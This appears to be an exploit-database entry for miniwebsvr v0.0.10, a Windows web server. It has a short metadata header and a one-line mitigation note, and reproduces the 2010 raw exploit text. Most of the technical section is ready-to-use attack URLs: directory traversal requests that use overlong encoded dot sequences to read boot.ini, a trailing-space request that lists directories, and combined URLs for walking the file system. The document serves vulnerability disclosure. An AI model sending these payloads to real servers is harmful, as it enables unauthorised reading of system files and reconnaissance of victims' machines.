miniwebsvr v0.0.10 Directory Traversal/Listing Exploits

vendor:

miniwebsvr

by:

Dr_IDE

4,3

CVSS

MEDIUM

Directory Traversal/Listing

CWE

Product Name: miniwebsvr

Affected Version From: v0.0.10

Affected Version To: v0.0.10

Patch Exists: NO

Related CWE: N/A

CPE: miniwebsvr

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2010

miniwebsvr v0.0.10 Directory Traversal/Listing Exploits

miniwebsvr v0.0.10 is a Windows based HTTP server. This is the latest version of the application available. miniwebsvr v0.0.10 is vulnerable to remote directory traversal attacks. The two vulnerabilies could be used together for directory walking.

Mitigation:

Ensure that the application is not vulnerable to directory traversal attacks by validating user input.

Source

Exploit-DB raw data:

###################################################################
#
# miniwebsvr v0.0.10 Directory Traversal/Listing Exploits
# Found By:	Dr_IDE
# Date: 	May 12, 2010
# Download:	http://sourceforge.net/projects/miniwebsvr/
# Tested on:	Windows 7
#
###################################################################

- Description -

miniwebsvr v0.0.10 is a Windows based HTTP server. This is the latest
version of the application available.

miniwebsvr v0.0.10 is vulnerable to remote directory traversal attacks. 

- Directory Traversal Technical Details -

http://[ webserver IP][:port]%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./boot.ini
http://[ webserver IP][:port]%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini

- Directory Listing Technical Details -

http://[ webserver IP][:port]%20	(This will list out the current directory)

- The two vulnerabilies could be used together for directory walking -

http://[ webserver IP][:port]%c0.%c0./%c0.%c0./%c0.%c0./%20
http://[ webserver IP][:port]%c0.%c0./%c0.%c0./%20
http://[ webserver IP][:port]%c0.%c0./%20

#[pocoftheday.blogspot.com]